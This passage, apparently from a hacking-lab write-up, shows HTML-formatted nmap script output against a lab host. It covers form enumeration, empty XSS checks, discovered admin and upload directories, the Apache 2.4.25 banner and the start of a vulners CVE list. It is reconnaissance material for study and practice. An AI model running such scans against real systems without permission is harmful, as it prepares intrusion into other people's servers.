normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/ko/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/en/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/fr/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/tr/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/es/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Path</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com:80/manual/da/index.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">id</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">|_ Form </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">action</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//www.google.com/search</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">_http-dombased-xss</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Couldn't find any DOM based XSS.</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http-enum</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| /admin/login.</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">php</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Possible admin folder</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| /doc/: Potentially interesting folder</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| /lib/: Potentially interesting folder</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| /manual/: Potentially interesting folder</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| /modules/: Potentially interesting directory w/ listing on </span><span style="color: #a2fca2; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">'apache/2.4.25 (debian)'</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| /tmp/: Potentially interesting directory w/ listing on </span><span style="color: #a2fca2; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">'apache/2.4.25 (debian)'</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">|_ /uploads/: Potentially interesting directory w/ listing on </span><span style="color: #a2fca2; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">'apache/2.4.25 (debian)'</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">_http-server-header</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Apache/</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2.4</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">25</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (Debian)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">_http-stored-xss</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Couldn't find any stored XSS vulnerabilities.</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">vulners</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">cpe</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:/</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">a</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">apache</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http_server</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2.4</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">25</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7679</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7.5</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-7679</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: 